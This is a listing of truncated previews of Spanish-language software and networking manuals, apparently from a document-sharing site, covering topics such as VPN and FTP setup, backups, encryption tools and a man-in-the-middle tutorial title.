UNED Centro Asociado de Cádiz RESUMEN DE CONCEPTOS BASICOS DE PROGRAMACION JAVA 1. OBJETOS Cualquier elemento del programa es un objeto. Un programa es un conjunto de objetos que se comunican entre sí
Más detallesPerson IP CRM Manual MOBILE
Manual MOBILE División Informática BuscPerson Telecomunicaciones : Manual MOBILE 0.- Introducción 3 0.1 Configuración de los terminales 3 0.2 Acceso de Usuarios 3 1.- Funcionalidades CRM 5 1.1 Agenda del
Más detallesaxtpv - Manual del usuario axtpv Profesional
axtpv Profesional 1 1. Introducción. axtpv POS Profesional es un producto para dispositivos Android creado para comercios de todo tipo, tanto de Restauración como de Retail. La funcionalidad puede cambiar
Más detallesFirewall Firestarter. Establece perímetros confiables.
Firewall Firestarter Qué es un Firewall? Un muro de fuego (firewall en inglés) es una parte de un sistema o una red que está diseñada para bloquear el acceso no autorizado, permitiendo al mismo tiempo
Más detallesMANUAL DE AYUDA MODULO TALLAS Y COLORES
MANUAL DE AYUDA MODULO TALLAS Y COLORES Fecha última revisión: Enero 2010 Índice TALLAS Y COLORES... 3 1. Introducción... 3 CONFIGURACIÓN PARÁMETROS TC (Tallas y Colores)... 3 2. Módulos Visibles... 3
Más detallesMejoras introducidas MARKETING GIO
Mejoras introducidas MARKETING GIO El proceso lógico para hacer uso de la utilidad de marketing se tendrán en cuenta 3 puntos: 1. Segmentación de la base de datos de clientes, para determinar a quién va
Más detallesManual Sistema de Afiliados Lomas Travel
Manual Sistema de Afiliados Lomas Travel Contenido Registro de Afiliados... 3 Administración de su cuenta... 7 Ingresar... 7 Uso del Administrador... 8 Configuración de Plantilla... 9 1.-Opción de subir
Más detallesPrograma diseñado y creado por 2014 - Art-Tronic Promotora Audiovisual, S.L.
Manual de Usuario Programa diseñado y creado por Contenido 1. Acceso al programa... 3 2. Opciones del programa... 3 3. Inicio... 4 4. Empresa... 4 4.2. Impuestos... 5 4.3. Series de facturación... 5 4.4.
Más detallesCOPIAS DE SEGURIDAD CON COBIAN BACKUP INSTALACIÓN Y CONFIGURACIÓN
COPIAS DE SEGURIDAD CON COBIAN BACKUP INSTALACIÓN Y CONFIGURACIÓN Qué es Cobian Backup? Cobian Backup es un programa multitarea que podemos usar para crear y restaurar copias de seguridad de nuestros archivos
Más detallesInstalación de ActivePerl en MS Windows
Instalación de ActivePerl en MS Windows Rubén Armañanzas Arnedillo ruben@aula325.com 26 de septiembre de 2002 1. Descarga de los ejecutables necesarios En primer lugar vamos a descargar los ficheros que
Más detallesConfiguracion Escritorio Remoto Windows 2003
Configuracion Escritorio Remoto Windows 2003 Instalar y configurar servicio de Terminal Server en Windows 2003 Fecha Lunes, 25 diciembre a las 17:04:14 Tema Windows (Sistema Operativo) Os explicamos cómo
Más detallesPara descargar la versión más reciente de Skype accedemos al sitio web de Skype y luego hacemos clic en Descargar Skype para escritorio de Windows.
Skype Skype: este servicio nos permite comunicarnos en forma sincrónica con nuestros contactos mediante mensajes instantáneos (chat) y realizando video llamadas. Skype Microsoft cuenta con un sistema de
Más detallesInstalar protocolo, cliente o servicio nuevo. Seleccionar ubicación de red. Práctica - Compartir y conectar una carpeta
Configuración de una red con Windows Aunque existen múltiples sistemas operativos, el más utilizado en todo el mundo sigue siendo Windows de Microsoft. Por este motivo, vamos a aprender los pasos para
Más detallesManual de iniciación a
DOCUMENTACIÓN Picasa y otras nubes Manual de iniciación a DROPBOX 1 Últimamente se ha hablado mucho de la nube y de cómo es el futuro de la Web. También se han presentado servicios y aplicaciones que ya
Más detallesControl de presencia para terminal por huella dactilar
Manual de software Control de presencia para terminal por huella dactilar Access FP (SOFTWARE PARA LECTOR DE HUELLA DACTILAR SIMON ALERT REF.: 8902003-039 y 8902004-039) (Versión de sofware 1.5) (Versión
Más detallesNotas para la instalación de un lector de tarjetas inteligentes.
Notas para la instalación de un lector de tarjetas inteligentes. Índice 0. Obtención de todo lo necesario para la instalación. 3 1. Comprobación del estado del servicio Tarjeta inteligente. 4 2. Instalación
Más detallesCrear cuentas de correo en Outlook 2010
Crear cuentas de correo en Outlook 2010 1. En Outlook 2010, en la ficha Archivo Información, pulsamos en Agregar Cuenta 2. En la siguiente ventana seleccionamos Configurar manualmente las opciones del
Más detallesLa plantilla propone aprovechar esta estructura en común y sólo modificar el contenido del área del documento que sea diferente.
PLANTILLAS EN PHP El concepto de plantilla, es un criterio del desarrollo web que propone optimizar la cantidad de documentos HTML que se usan en el desarrollo de un sitio web. A lo largo de la navegación
Más detallesPS.Vending Almacén Pocket PC
Versión 1.0 Enero 2013 Autor: Pedro Naranjo Rodríguez www.psvending.es Contenido Qué es PS.Vending Almacén Pocket PC?... 3 Funciona PS.Vending Almacén Pocket PC independiente de PS.Vending?... 3 Requisitos...
Más detallesVPN sobre red local. Vicente Sánchez Patón I.E.S Gregorio Prieto. Tema 3 SAD
Tema 3 SAD VPN sobre red local Vicente Sánchez Patón I.E.S Gregorio Prieto Tema 3 SAD a)instalación de un servidor VPN en Windows XP/7/ Windows 2003/2008 Server. Instalaremos el servicio VPN en Windows
Más detallesProtocolo Traslado_envío datos personales
Protección de la información en mi ordenador. TrueCrypt aplicación para cifrar y proteger la información La manera de evitar los problemas derivados de que la información privada quede expuesta a personas
Más detallesProyecto Tecnológico Prof. Carolina Quinodóz 6º2º - TM
Fuente: Revista Dr.Max Protocolo FTP El FTP es uno de los sistemas de almacenamiento y distribución de archivos más populares de Internet. La sencillez con la que se realizan el montaje y el acceso, permiten
Más detallesBREVE INTRODUCCIÓN A IPSEC
La seguridad ha sido, desde siempre, el gran caballo de batalla para los administradores de sistemas. Dentro de las múltiples soluciones que podemos implementar en nuestra instalación nos centraremos hoy
Más detallesIntegración KNX - LYNX
Integración KNX - LYNX INTEGRACIÓN KNX - LYNX CONTENIDO 1 Introducción... 2 2 Material requerido... 2 3 Configuración del servidor Web Dominium KNX... 3 3.1 Configuración de la interfaz Ethernet... 4 3.2
Más detallesMinisterio de Educación. Base de datos en la Enseñanza. Open Office. Módulo 5: Report Builder
Ministerio de Educación Base de datos en la Enseñanza. Open Office Módulo 5: Report Builder Instituto de Tecnologías Educativas 2011 Informes con Oracle Report Builder En su configuración original, OpenOffice
Más detallesManual de Instalación y uso de FTP
Manual de Instalación y uso de FTP Que es el FTP? El FTP es un sistema que nos permite de forma cómoda subir o bajar archivos a otra ubicación. Hay FTP públicos y privados, es decir en algunos todo el
Más detallesPero, vamos por partes. Lógicamente, lo primero que tendremos que hacer es entrar en nuestra cuenta de correo y pinchar en.
Siempre que queramos enviar un archivo por correo tenemos que tener en cuenta que todos los correos tienen una limitación de espacio. En el caso de yahoo son 25 MB por correo. Pero para facilitar el envío
Más detallesÍNDICE INDICE. MANUAL WinPoET. Manual de formularios en Manual WinPoET
ÍNDICE INDICE MANUAL WinPoET Índice 1. Introducción 3 2. Windows 2000, 98 y ME - Instalación y configuración del WinPoET 3 3. Windows XP Configuración de la conexión 8 4. Windows XP - Comprobación de la
Más detallesPaso 2 Una vez se ha completado la instalación y ejecutado el programa, veremos esto
Configuración de FTP con Filezilla El uso de FTP facilitara la forma de trabajar con nuestro servidor, los programas de FTP son una alternativa mas practica al gestor de archivos de nuestro panel de control,
Más detallesCómo crear un LiveCD de Windows XP/2k3
Cómo crear un LiveCD de Windows XP/2k3 Bueno, voy a hablar de cómo crear un LiveCD de Windows XP/2k3 con el programa PeBuilder. Las ventajas de crearnos un LiveCD de WindowsXP/2k3 es que en tan solo un
Más detallesRedes de Área Local: Configuración de una VPN en Windows XP
Redes de Área Local: Configuración de una VPN en Windows XP Tatiana Echegoyen Blasco Facultad de Informática UPV - Curso 2005/2006 Índice 1. Qué es una VPN?...2 2. Cómo funciona una VPN?...2 3. Por qué
Más detallesMan In The Middle con Ettercap
1 de 10 01/12/2007 2:02 Man In The Middle con Ettercap MITM - Man In The Middle - Envenenamiento ARP - ARP spoofing - ARP poisoning, En este tutorial se explica cómo esnifar una red o un equipo en concreto
Más detallesInternet, conceptos básicos
Internet, conceptos básicos IP (INTERNET PROTOCOL) Toda computadora tiene un número que la identifica en una red, este número es lo que llamamos IP, una dirección de IP típica se ve de esta manera Direcciones
Más detallesMANUAL DE USUARIO. Convocatoria 2013 Fundación para la Prevención de Riesgos Laborales IT-0103/2013 Prevengra 4
Convocatoria 2013 Fundación para la Prevención de Riesgos Laborales IT-0103/2013 Prevengra 4 MANUAL DE USUARIO Software de Integración Documental de Prevención de Riesgos Laborales para la PYME de Granada
Más detalles